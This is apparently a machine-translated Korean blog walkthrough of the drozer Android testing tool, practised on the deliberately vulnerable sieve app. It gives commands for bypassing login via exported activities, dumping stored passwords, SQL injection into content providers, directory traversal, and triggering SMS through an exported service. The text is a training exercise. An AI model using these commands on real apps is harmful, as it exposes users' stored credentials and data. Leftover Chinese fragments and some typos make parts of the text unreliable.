안드로이드 침투 테스트 도구 --- drozer 사용

drozer 다운로드

다운로드 링크 : drozer

드로 저 설치

소프트웨어를 다운로드하고 압축을 풀고 압축 해제 디렉토리를 입력하고 setup.exe를 클릭 한 다음 프롬프트에 따라 설치를 완료하고 기본적으로 C 드라이브에
설치하고 agent.apk를 전화기로 전송하고 설치하십시오.
여기에 사진 설명 삽입

체 (drozer 테스트 프로그램)

다운로드 링크 : sieve
소개 : sieve는 일반적인 Android 애플리케이션 취약성을 포함하고 있으며 drozer 연습을위한 테스트 개체로 사용할 수있는 작은 암호 관리 소프트웨어입니다.
사용법 : sieve를 처음 시작할 때 사용자가 나중에 입력 할 암호를 보호하기 위해 16 자 "마스터 암호"와 4 자리 핀을 설정해야합니다. 사용자는 sieve를 사용하여 다양한 서비스에 대한 암호를 저장할 수 있으며 올바른 자격 증명이 필요한 경우 나중에 데이터에서 이러한 암호를 검색 할 수 있습니다.

드로 저 사용

휴대폰과 PC 간의 연결 설정

1. 휴대폰에서 drozer 에이전트를 열고 Embedded Server를 엽니 다.
여기에 사진 설명 삽입2. PC 측은 ADB를 통해 포워딩 포트를 설정합니다.
여기에 사진 설명 삽입
3. PC 쪽 dos 아래에 drozer 설치 디렉터리를 입력하고 명령을 실행 한 후 휴대폰의 drozer 에이전트와 성공적으로 연결합니다.
여기에 사진 설명 삽입
지침
"java를 찾을 수 없습니다 ..."라는 오류
가보고되면 .drozer_config라는 파일을 만들고 파일에 다음 내용을 추가합니다.
[executables]
java = D : \ Java \ jdk1.7.0_65 \ bin \ java.exe
javac = D : \ Java \ jdk1.7.0_65 \ bin \ javac.exe
는 java 및 javac의 경로이며이를 저장하고 C : \ Users \ XXX \ 디렉토리에 저장합니다. 여기서 XXX는 현재 사용자 이름 디렉토리입니다. 그런 다음 성공적으로 다시 연결하십시오.

공격 표면 결정

dz> run app.package.list // 설치된 모든 애플리케이션 패키지 이름 나열
dz> run app.package.list -f sieve // ​​특정 패키지 이름 검색
여기에 사진 설명 삽입
dz> run app.package.info -a com.mwr. example .sieve // ​​애플리케이션 정보보기
여기에 사진 설명 삽입

dz> run app.package.attacksurface com.mwr.example.sieve // ​​공격 표면 식별
여기에 사진 설명 삽입

내 보낸 테스트 활동 (로그인 확인을 우회하기 쉬움)

dz> run app.activity.info -a com.mwr.example.sieve // ​​노출 된 활동 정보 표시
여기에 사진 설명 삽입

dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //이 명령은
여기에 사진 설명 삽입
sieve 소프트웨어를보기 위해 활동 휴대폰 을 시작하는 데 적합한 인 텐트를 생성합니다. 확인이 필요합니다. 시스템에 들어갈 수 있습니다.
여기에 사진 설명 삽입

테스트 콘텐츠 제공자 (데이터베이스 누출, SQL 주입 등을 유발하기 쉬움)

dz> run app.provider.info -a com.mwr.example.sieve // ​​콘텐츠 제공자 정보 나열
여기에 사진 설명 삽입

dz> run app.provider.finduri com.mwr.example.sieve // ​​枚举 uri
여기에 사진 설명 삽입

dz> run scanner.provider.finduris -a com.mwr.example.sieve // ​​스캐너를 사용하여 uri 열거
여기에 사진 설명 삽입

dz> run scanner.provider.injection -a com.mwr.example.sieve // ​​사용 가능한 URI 감지, SQL 주입 확인
여기에 사진 설명 삽입

이제 다른 drozer 모듈을 사용하여 이러한 콘텐츠 URI에서 정보를 검색하고 데이터베이스의 데이터를 수정할 수도 있습니다.

dz> run app.provider.query content : //com.mwr.example.sieve.DBContentProvider/Passwords/ // 데이터베이스 데이터 가져 오기 (즉, 이전에 저장 한 비밀번호 및 이메일 정보)
여기에 사진 설명 삽입

dz> run app.provider.query content : //com.mwr.example.sieve.DBContentProvider/Keys/ --vertical // 데이터베이스 데이터를 세로로 표시
여기에 사진 설명 삽입

SQL 주입에 노출 된 콘텐츠 공급자 사용

dz> run app.provider.query content : //com.mwr.example.sieve.DBContentProvider/Keys/ --projection " '"// 데이터베이스는 오류 정보를 반환하고 sql 쿼리 문을 생성 한 다음 쿼리하도록 구성합니다. 얻을 데이터베이스 정보
여기에 사진 설명 삽입

dz> run app.provider.query content : //com.mwr.example.sieve.DBContentProvider/Keys/ --selection“ '”
여기에 사진 설명 삽입

dz> run app.provider.query content : //com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type = 'table';-"// Sql을 사용하여 데이터베이스 모든 데이터 시트
여기에 사진 설명 삽입

여기에 사진 설명 삽입

파일 시스템 지원 컨텐츠 제공자로부터 정보 얻기

dz> run scanner.provider.traversal -a com.mwr.example.sieve // ​​디렉터리 탐색 감지
여기에 사진 설명 삽입

dz> run app.provider.read content : //com.mwr.example.sieve.FileBackupProvider/etc/hosts // 디렉토리 탐색
여기에 사진 설명 삽입

dz> app.provider.download content : //com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/database/database.db /home/user/database.db를 실행하여 지정된 파일 지정된 디렉터리로 이동합니다 (Windows 아래 디렉터리를 지정하지 않는 것이 좋습니다. 문제가있을 수 있으므로 drozer의 기본 디렉터리로 직접 이동)
여기에 사진 설명 삽입

내 보낸 테스트 서비스 (권한 에스컬레이션)

run app.service.info -a com.android.nsf // 서비스 세부 정보 가져 오기

run app.service.send com.adnroid.nsf com.igexin.sdk.PushServiceUser --msg 1 2 3 // 访

run app.service.start --action com.test.vulnerability.SEND_SMS --extra string dest 11111 --extra string text 1111 --extra string OP SEND_SMS

내 보낸 브로드 캐스트 수신기 테스트 (서비스 거부)

run app.broadcast.info -a com.android.nsf // 브로드 캐스트 수신기 정보 가져 오기

추천

출처blog.csdn.net/guo15890025019/article/details/109841075